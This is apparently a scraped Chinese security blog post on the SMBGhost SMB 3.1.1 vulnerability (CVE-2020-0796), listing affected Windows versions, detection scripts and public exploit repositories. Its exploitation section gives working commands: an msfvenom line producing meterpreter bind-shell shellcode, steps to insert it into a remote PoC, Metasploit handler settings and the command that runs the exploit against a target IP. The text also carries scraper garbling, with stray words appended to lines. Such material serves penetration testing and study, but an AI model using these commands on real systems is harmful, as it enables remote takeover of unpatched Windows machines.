CVE-2020-0796 漏洞检测及利用工具

0x01漏洞描述

2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁,目前,远程利用poc代码已公布,本文介绍cve-2020-0796漏洞的检测及利用,来协助你们对未修复的漏洞检测和防护。漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有通过安全检查,直接使用会引起内存破坏漏洞,可能被者利用远程执行任意代码。者利用该漏洞无须权限便可实现远程代码执行,受**的目标系统只需开机在线便可能被***。python

0x02 影响版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)git

0x03 漏洞检测

脚本检测
https://github.com/ollypwn/SMBGhost
检测返回的smb的版本,这种检测方式存在必定的误报
CVE-2020-0796 漏洞检测及利用工具
CVE-2020-0796 漏洞检测及利用工具github

能够发现检测出存在该漏洞
https://github.com/joaozietolie/CVE-2020-0796-Checker
利用nmap脚本检测方式检测
CVE-2020-0796 漏洞检测及利用工具
CVE-2020-0796 漏洞检测及利用工具shell

奇安信检测工具
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
CVE-2020-0796 漏洞检测及利用工具windows

0X04漏洞利用

本地提权
https://github.com/danigargu/CVE-2020-0796
本地普通权限用户经过exp提权后,成功的获取了系统的system权限
CVE-2020-0796 漏洞检测及利用工具
远程poc利用
https://github.com/chompie1337/SMBGhost_RCE_PoC
首先下载远程利用poc
CVE-2020-0796 漏洞检测及利用工具
利用msf生成shellcode安全

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

CVE-2020-0796 漏洞检测及利用工具
把buf 替换成USER_PAYLOAD
CVE-2020-0796 漏洞检测及利用工具
开启msf监听tcp

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.10.183
run

CVE-2020-0796 漏洞检测及利用工具
运行exp
python3 exploit.py -ip 192.168.10.183
CVE-2020-0796 漏洞检测及利用工具
能够看到咱们返回了一个meterpreteride

免责申明:    
本项目仅进行信息搜集,漏洞探测工做,无漏洞利用、***性行为,发文初衷为仅为方便安全人员对受权项目完成测试工做和学习交流使用。       请使用者遵照当地相关法律,勿用于非受权测试,勿用于非受权测试,勿用于非受权测试(重要的事情说三遍),如做他用所承受的法律责任一律与东塔安全学院无关!!!工具

相关文章
相关标签/搜索